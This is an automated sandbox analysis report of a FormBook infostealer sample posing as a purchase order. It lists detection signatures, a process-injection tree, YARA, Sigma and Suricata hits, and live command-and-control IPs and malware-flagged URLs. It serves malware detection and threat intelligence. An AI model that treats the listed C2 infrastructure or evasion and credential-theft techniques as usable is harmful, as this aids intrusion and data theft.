Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO 4110007694.exe

Overview

General Information

Sample name:PO 4110007694.exe
Analysis ID:1568199
MD5:125b9b9f3011e06fcb331140ce8bf01f
SHA1:39268897cfc54a3bcb8e94319708f1666297f862
SHA256:ad7f45c75e8fa4024a61f3ec31ae47385ebca8092a915d5c3c4e4fcc8f117a49
Tags:exeFormbookuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PO 4110007694.exe (PID: 6260 cmdline: "C:\Users\user\Desktop\PO 4110007694.exe" MD5: 125B9B9F3011E06FCB331140CE8BF01F)
    • svchost.exe (PID: 6452 cmdline: "C:\Users\user\Desktop\PO 4110007694.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • hLRGQqcplWvpUw.exe (PID: 3716 cmdline: "C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • bitsadmin.exe (PID: 1720 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)
          • hLRGQqcplWvpUw.exe (PID: 4348 cmdline: "C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2836 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4114791942.0000000003280000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4117111147.00000000053E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1895662906.0000000006D00000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.4113656138.0000000002B80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.4114738212.0000000003230000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Process Parents
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe" , CommandLine: "C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe, NewProcessName: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe, OriginalFileName: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 1720, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe" , ProcessId: 4348, ProcessName: hLRGQqcplWvpUw.exe
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO 4110007694.exe", CommandLine: "C:\Users\user\Desktop\PO 4110007694.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 4110007694.exe", ParentImage: C:\Users\user\Desktop\PO 4110007694.exe, ParentProcessId: 6260, ParentProcessName: PO 4110007694.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO 4110007694.exe", ProcessId: 6452, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PO 4110007694.exe", CommandLine: "C:\Users\user\Desktop\PO 4110007694.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 4110007694.exe", ParentImage: C:\Users\user\Desktop\PO 4110007694.exe, ParentProcessId: 6260, ParentProcessName: PO 4110007694.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO 4110007694.exe", ProcessId: 6452, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-04T12:49:34.577709+010020507451Malware Command and Control Activity Detected192.168.2.449736161.97.168.24580TCP
                2024-12-04T12:50:00.156746+010020507451Malware Command and Control Activity Detected192.168.2.44974227.124.4.24680TCP
                2024-12-04T12:50:16.312001+010020507451Malware Command and Control Activity Detected192.168.2.449784149.88.81.19080TCP
                2024-12-04T12:50:31.856451+010020507451Malware Command and Control Activity Detected192.168.2.44982585.159.66.9380TCP
                2024-12-04T12:50:47.033657+010020507451Malware Command and Control Activity Detected192.168.2.449862185.27.134.14480TCP
                2024-12-04T12:51:02.253784+010020507451Malware Command and Control Activity Detected192.168.2.449897104.21.95.16080TCP
                2024-12-04T12:51:17.199008+010020507451Malware Command and Control Activity Detected192.168.2.449935104.21.57.24880TCP
                2024-12-04T12:51:32.537230+010020507451Malware Command and Control Activity Detected192.168.2.449973154.88.22.10180TCP
                2024-12-04T12:51:47.416118+010020507451Malware Command and Control Activity Detected192.168.2.450012209.74.77.10780TCP
                2024-12-04T12:52:14.720776+010020507451Malware Command and Control Activity Detected192.168.2.450040104.21.34.10380TCP
                2024-12-04T12:52:32.225834+010020507451Malware Command and Control Activity Detected192.168.2.45004420.2.249.780TCP
                2024-12-04T12:52:47.426257+010020507451Malware Command and Control Activity Detected192.168.2.450048156.251.17.22480TCP
                2024-12-04T12:53:02.438178+010020507451Malware Command and Control Activity Detected192.168.2.45005247.254.140.25580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-04T12:49:34.577709+010028554651A Network Trojan was detected192.168.2.449736161.97.168.24580TCP
                2024-12-04T12:50:00.156746+010028554651A Network Trojan was detected192.168.2.44974227.124.4.24680TCP
                2024-12-04T12:50:16.312001+010028554651A Network Trojan was detected192.168.2.449784149.88.81.19080TCP
                2024-12-04T12:50:31.856451+010028554651A Network Trojan was detected192.168.2.44982585.159.66.9380TCP
                2024-12-04T12:50:47.033657+010028554651A Network Trojan was detected192.168.2.449862185.27.134.14480TCP
                2024-12-04T12:51:02.253784+010028554651A Network Trojan was detected192.168.2.449897104.21.95.16080TCP
                2024-12-04T12:51:17.199008+010028554651A Network Trojan was detected192.168.2.449935104.21.57.24880TCP
                2024-12-04T12:51:32.537230+010028554651A Network Trojan was detected192.168.2.449973154.88.22.10180TCP
                2024-12-04T12:51:47.416118+010028554651A Network Trojan was detected192.168.2.450012209.74.77.10780TCP
                2024-12-04T12:52:14.720776+010028554651A Network Trojan was detected192.168.2.450040104.21.34.10380TCP
                2024-12-04T12:52:32.225834+010028554651A Network Trojan was detected192.168.2.45004420.2.249.780TCP
                2024-12-04T12:52:47.426257+010028554651A Network Trojan was detected192.168.2.450048156.251.17.22480TCP
                2024-12-04T12:53:02.438178+010028554651A Network Trojan was detected192.168.2.45005247.254.140.25580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-04T12:49:52.219235+010028554641A Network Trojan was detected192.168.2.44973727.124.4.24680TCP
                2024-12-04T12:49:54.844256+010028554641A Network Trojan was detected192.168.2.44973827.124.4.24680TCP
                2024-12-04T12:49:57.500488+010028554641A Network Trojan was detected192.168.2.44973927.124.4.24680TCP
                2024-12-04T12:50:08.322933+010028554641A Network Trojan was detected192.168.2.449763149.88.81.19080TCP
                2024-12-04T12:50:11.000584+010028554641A Network Trojan was detected192.168.2.449769149.88.81.19080TCP
                2024-12-04T12:50:13.656916+010028554641A Network Trojan was detected192.168.2.449775149.88.81.19080TCP
                2024-12-04T12:50:24.063375+010028554641A Network Trojan was detected192.168.2.44980285.159.66.9380TCP
                2024-12-04T12:50:26.722193+010028554641A Network Trojan was detected192.168.2.44980885.159.66.9380TCP
                2024-12-04T12:50:29.394194+010028554641A Network Trojan was detected192.168.2.44981685.159.66.9380TCP
                2024-12-04T12:50:38.879151+010028554641A Network Trojan was detected192.168.2.449841185.27.134.14480TCP
                2024-12-04T12:50:41.691760+010028554641A Network Trojan was detected192.168.2.449847185.27.134.14480TCP
                2024-12-04T12:50:44.412120+010028554641A Network Trojan was detected192.168.2.449853185.27.134.14480TCP
                2024-12-04T12:50:54.031935+010028554641A Network Trojan was detected192.168.2.449879104.21.95.16080TCP
                2024-12-04T12:50:56.413445+010028554641A Network Trojan was detected192.168.2.449885104.21.95.16080TCP
                2024-12-04T12:50:59.102269+010028554641A Network Trojan was detected192.168.2.449891104.21.95.16080TCP
                2024-12-04T12:51:09.203109+010028554641A Network Trojan was detected192.168.2.449916104.21.57.24880TCP
                2024-12-04T12:51:11.872200+010028554641A Network Trojan was detected192.168.2.449924104.21.57.24880TCP
                2024-12-04T12:51:14.514792+010028554641A Network Trojan was detected192.168.2.449930104.21.57.24880TCP
                2024-12-04T12:51:24.517114+010028554641A Network Trojan was detected192.168.2.449953154.88.22.10180TCP
                2024-12-04T12:51:27.188206+010028554641A Network Trojan was detected192.168.2.449960154.88.22.10180TCP
                2024-12-04T12:51:29.875736+010028554641A Network Trojan was detected192.168.2.449967154.88.22.10180TCP
                2024-12-04T12:51:39.434909+010028554641A Network Trojan was detected192.168.2.449989209.74.77.10780TCP
                2024-12-04T12:51:42.097305+010028554641A Network Trojan was detected192.168.2.449998209.74.77.10780TCP
                2024-12-04T12:51:44.812562+010028554641A Network Trojan was detected192.168.2.450005209.74.77.10780TCP
                2024-12-04T12:52:06.692831+010028554641A Network Trojan was detected192.168.2.450037104.21.34.10380TCP
                2024-12-04T12:52:09.364227+010028554641A Network Trojan was detected192.168.2.450038104.21.34.10380TCP
                2024-12-04T12:52:12.089088+010028554641A Network Trojan was detected192.168.2.450039104.21.34.10380TCP
                2024-12-04T12:52:24.157273+010028554641A Network Trojan was detected192.168.2.45004120.2.249.780TCP
                2024-12-04T12:52:26.816512+010028554641A Network Trojan was detected192.168.2.45004220.2.249.780TCP
                2024-12-04T12:52:29.518405+010028554641A Network Trojan was detected192.168.2.45004320.2.249.780TCP
                2024-12-04T12:52:39.414424+010028554641A Network Trojan was detected192.168.2.450045156.251.17.22480TCP
                2024-12-04T12:52:42.082861+010028554641A Network Trojan was detected192.168.2.450046156.251.17.22480TCP
                2024-12-04T12:52:44.766522+010028554641A Network Trojan was detected192.168.2.450047156.251.17.22480TCP
                2024-12-04T12:52:54.298723+010028554641A Network Trojan was detected192.168.2.45004947.254.140.25580TCP
                2024-12-04T12:52:56.964994+010028554641A Network Trojan was detected192.168.2.45005047.254.140.25580TCP
                2024-12-04T12:52:59.716476+010028554641A Network Trojan was detected192.168.2.45005147.254.140.25580TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.soainsaat.xyz/rum2/Avira URL Cloud: Label: malware
                Source: http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K7yngZPbDkFJ2MbPrWQrwotde8x+DERdOM8=&WnQdf=JhLPWAvira URL Cloud: Label: malware
                Source: http://www.duwixushx.xyz/q0vk/Avira URL Cloud: Label: malware
                Source: http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3Avira URL Cloud: Label: malware
                Source: http://www.amayavp.xyz/d9ku/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: PO 4110007694.exeReversingLabs: Detection: 39%
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4114791942.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4117111147.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1895662906.0000000006D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4113656138.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4114738212.0000000003230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1883944233.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1885773704.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4114931150.0000000004180000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: PO 4110007694.exeJoe Sandbox ML: detected
                Source: PO 4110007694.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000001.00000003.1851384519.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851083063.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000003.2206906784.000000000114B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000001.00000003.1851384519.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851083063.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000003.2206906784.000000000114B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hLRGQqcplWvpUw.exe, 00000002.00000000.1806902391.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4113682145.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO 4110007694.exe, 00000000.00000003.1654212049.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PO 4110007694.exe, 00000000.00000003.1655277180.0000000004190000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885175083.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885175083.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1787377160.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1785653009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.1887433668.000000000310A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.1891223463.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.0000000003460000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO 4110007694.exe, 00000000.00000003.1654212049.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PO 4110007694.exe, 00000000.00000003.1655277180.0000000004190000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1885175083.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885175083.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1787377160.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1785653009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 00000004.00000003.1887433668.000000000310A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.1891223463.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.0000000003460000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7445A
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7C6D1 FindFirstFileW,FindClose,0_2_00C7C6D1
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00C7C75C
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C7EF95
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C7F0F2
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7F3F3
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C737EF
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C73B12
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7BCBC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02B9C640 FindFirstFileW,FindNextFileW,FindClose,4_2_02B9C640
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4x nop then xor eax, eax4_2_02B89E80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4x nop then mov ebx, 00000004h4_2_037B04FE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49784 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49784 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49802 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49808 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49825 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49816 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49825 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49847 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49853 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49841 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49742 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49862 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49862 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49879 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49885 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49897 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49897 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49891 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49916 -> 104.21.57.248:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49930 -> 104.21.57.248:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49953 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49924 -> 104.21.57.248:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49960 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49935 -> 104.21.57.248:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49935 -> 104.21.57.248:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49967 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49973 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49973 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49998 -> 209.74.77.107:80
